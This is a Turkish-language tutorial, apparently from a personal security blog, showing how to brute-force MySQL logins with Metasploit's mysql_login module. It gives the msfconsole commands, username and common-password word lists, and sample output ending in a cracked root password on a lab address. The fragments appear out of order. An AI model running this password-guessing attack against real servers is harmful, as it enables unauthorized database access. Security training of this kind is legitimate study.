\nroot@ayhanarda:~# service metasploit start<\/strong>
\nroot@ayhanarda:~# msfconsole<\/strong><\/p>\n
\u015eimdi msf console umuz a\u00e7\u0131lm\u0131\u015f durumda. \u015eimdi bu \u015fifre denemelerini yapacak auxiliary mod\u00fcl\u00fcm\u00fcz\u00fc a\u00e7al\u0131m.<\/p>\n
msf > use auxiliary\/scanner\/mysql\/mysql_login<\/strong><\/p>\n \u015eifre denemesi yapmak istedi\u011fimiz mysql server\u0131n ip adresinin 192.168.1.10 oldu\u011funu varsayal\u0131m. \u015eimdi msf \u00fczerinde bunu set edelim.<\/p>\n msf auxiliary(mysql_login) > set RHOSTS 192.168.1.10<\/strong><\/p>\n \u015eimdi denenmesi i\u00e7in haz\u0131rlad\u0131\u011f\u0131m\u0131z k.adlar\u0131n\u0131 i\u00e7eren dosyam\u0131z\u0131n yolunu g\u00f6sterelim.<\/p>\n msf auxiliary(mysql_login) > set USER_FILE \/root\/user.lst<\/strong><\/p>\n Bu dosyay\u0131 \u00f6nceden haz\u0131rlayabilirsiniz , i\u00e7eri\u011fi a\u015fa\u011f\u0131daki gibi her sat\u0131ra bir k.ad\u0131 gelecek \u015fekilde olmal\u0131.<\/p>\n root@ayhanarda:~# cat \/root\/user.lst \u015eimdi ayn\u0131 \u015fekilde \u015fifreler i\u00e7eren dosyam\u0131z\u0131n yolunu set edelim.Yol de\u011fi\u015fiklik g\u00f6sterebilir , kali \u00fczerinde diledi\u011finiz yolda olu\u015fturabilir ve yolun ubuna g\u00f6re set edebilirsiniz.<\/p>\n msf auxiliary(mysql_login) > set PASS_FILE \/root\/pass.lst<\/strong><\/p>\n \u015eifre dosyas\u0131nda her sat\u0131ra bir denenecek \u015fifre gelecek \u015fekilde haz\u0131r olmal\u0131.<\/p>\n root@ayhanarda:~# cat \/root\/pass.lst \u015eimdi her\u015fey tamam ise auxilary modul\u00fcm\u00fcz\u00fc \u00e7al\u0131\u015ft\u0131rmam\u0131z yeterli. Komutu verdikten sonra set etti\u011fimiz ip adresindeki myql servera dosyalarda belirtilen k.adlar\u0131 ve \u015fifreler ile eri\u015fmeye \u00e7al\u0131\u015facak ve e\u011fer sunucunun mysql \u015fifresi dosyalarda yazanlardan biri ise Size bunu belirtecek. \u00c7al\u0131\u015ft\u0131rmak i\u00e7in a\u015fa\u011f\u0131daki komutu kullanabilirsiniz.<\/p>\n msf auxiliary(mysql_login) > run<\/strong><\/p>\n \u015eimdi sonu\u00e7lar a\u015fa\u011f\u0131dakine benzer olmal\u0131 ve g\u00f6r\u00fcld\u00fc\u011f\u00fc gibi \u015fifre ayhanarda imi\u015f.<\/p>\n [-] 192.168.1.10:3306 MYSQL – LOGIN FAILED: root:password(Incorrect: Access denied for user ‘root’@’192.168.1.2’ (using password: YES)) [+] 192.168.1.10:3306 MYSQL – Success: ‘root:ayhanarda<\/strong>‘ Ayhan ARDA<\/p>\n
\nadmin
\nroot
\nuser
\nroot_user
\nisimleri \u00e7o\u011faltabilirsiniz ya da k. ad\u0131n\u0131 zaten biliyorsan\u0131z sadece onu yazabilirsiniz.<\/p>\n
\npassword
\n123456
\n12345678
\n1234
\nqwerty
\n12345
\ndragon
\nayhanarda
\nbaseball
\nfootball
\nletmein
\nmonkey
\n696969<\/p>\n
\n[-] 192.168.1.10:3306 MYSQL – LOGIN FAILED: root:123456 (Incorrect: Access denied for user ‘root’@’192.168.1.2’ (using password: YES))
\n[-] 192.168.1.10:3306 MYSQL – LOGIN FAILED: root:12345678 (Incorrect: Access denied for user ‘root’@’192.168.1.2’ (using password: YES))
\n[-] 192.168.1.10:3306 MYSQL – LOGIN FAILED: root:1234 (Incorrect: Access denied for user ‘root’@’192.168.1.2’ (using password: YES))
\n[-] 192.168.1.10:3306 MYSQL – LOGIN FAILED: root:qwerty (Incorrect: Access denied for user ‘root’@’192.168.1.2’ (using password: YES))
\n[-] 192.168.1.10:3306 MYSQL – LOGIN FAILED: root:dragon (Incorrect: Access denied for user ‘root’@’192.168.1.2’ (using password: YES))<\/p>\n
\n[*] Scanned 1 of 1 hosts (100% complete)
\n[*] Auxiliary module execution completed<\/p>\n
![\"Share](\"https:\/\/static.hupso.com\/share\/buttons\/lang\/tr\/share-medium.png\")
<\/a>